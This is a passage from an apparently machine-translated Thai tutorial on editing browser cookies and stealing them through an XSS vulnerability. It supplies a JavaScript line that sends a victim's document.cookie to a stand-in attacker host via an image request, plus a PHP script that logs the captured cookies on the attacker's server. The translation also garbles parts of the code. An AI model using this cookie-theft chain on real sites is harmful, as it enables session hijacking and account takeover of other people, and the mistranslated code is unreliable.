ขั้นตอนที่ 6: หากต้องการเปลี่ยนคุกกี้ ให้แก้ไขไฟล์ C:\IE_ext.htm โดยแทนที่ ชื่อทดสอบในนามของคุกกี้ ค่าทดสอบ- ตามความหมายของมัน testdomain.ru– ไปยังโดเมนไซต์ หากจำเป็น ให้เพิ่มบรรทัดที่คล้ายกันเพิ่มเติม เพื่อความสะดวกในการควบคุม ฉันเพิ่มสคริปต์ผลลัพธ์ของคุกกี้ปัจจุบันก่อนและหลังการเปลี่ยนแปลง: การแจ้งเตือน (external.menuArguments.document.cookie);

ขั้นตอนที่ 7: ดำเนินการขั้นตอนที่ 5 อีกครั้ง จากนั้นรีเฟรชเพจ

ประเด็นสำคัญ: เราจะเข้าถึงแหล่งข้อมูลอินเทอร์เน็ตนี้ด้วยคุกกี้ที่อัปเดต

จะขโมยคุกกี้โดยใช้ JavaScript ได้อย่างไร?

หากผู้โจมตีสามารถค้นหาโอกาสในการรันสคริปต์ JavaScript บนคอมพิวเตอร์ของเหยื่อได้ เขาก็จะสามารถอ่านคุกกี้ปัจจุบันได้อย่างง่ายดาย ตัวอย่าง:


var str= document.cookie;

แต่เขาจะสามารถถ่ายโอนไปยังไซต์ของเขาได้หรือไม่ เพราะอย่างที่ฉันอธิบายไว้ก่อนหน้านี้ สคริปต์ JavaScript จะไม่สามารถเข้าถึงไซต์ที่อยู่บนโดเมนอื่นโดยไม่มีการยืนยันเพิ่มเติม ปรากฎว่าสคริปต์ JavaScript สามารถโหลดรูปภาพใด ๆ ที่อยู่บนเซิร์ฟเวอร์ http ใดก็ได้ ในเวลาเดียวกัน ให้ถ่ายโอนข้อมูลข้อความในคำขอดาวน์โหลดไปยังรูปภาพนี้ ตัวอย่าง: http://hackersite.ru/xss.jpg?text_infoดังนั้นหากคุณรันโค้ดนี้:

var img= รูปภาพใหม่ ();

img.src= "http://hackersite.ru/xss.jpg?"+ encodeURI(document.cookie);


จากนั้นคุกกี้จะจบลงในคำขอดาวน์โหลด "รูปภาพ" และจะ "ไป" ให้กับผู้โจมตี

จะจัดการกับคำขอดาวน์โหลด "รูปภาพ" ได้อย่างไร?

ผู้โจมตีเพียงต้องการค้นหาโฮสติ้งที่รองรับ PHP และใส่โค้ดดังนี้:

$uid=urldecode($_SERVER["QUERY_STRING"]);
$fp=fopen("log.txt","a");
fputs($fp,"$uid\n");
fclose($fp);
?>

จากนั้นพารามิเตอร์คำขอทั้งหมดสำหรับสคริปต์นี้จะถูกบันทึกไว้ในไฟล์ เข้าสู่ระบบ.txt- สิ่งที่เหลืออยู่คือการแทนที่ในสคริปต์ JavaScript ที่อธิบายไว้ก่อนหน้านี้ http://hackersite.ru/xss.jpgไปยังเส้นทางไปยังสคริปต์ php นี้


บรรทัดล่าง

ฉันแสดงเฉพาะวิธีที่ง่ายที่สุดในการใช้ประโยชน์จากช่องโหว่ XSS แต่สิ่งนี้พิสูจน์ได้ว่าการมีช่องโหว่ดังกล่าวอย่างน้อยหนึ่งรายการบนเว็บไซต์อินเทอร์เน็ตที่มีผู้ใช้หลายรายสามารถอนุญาตให้ผู้โจมตีใช้ทรัพยากรของตนในนามของคุณได้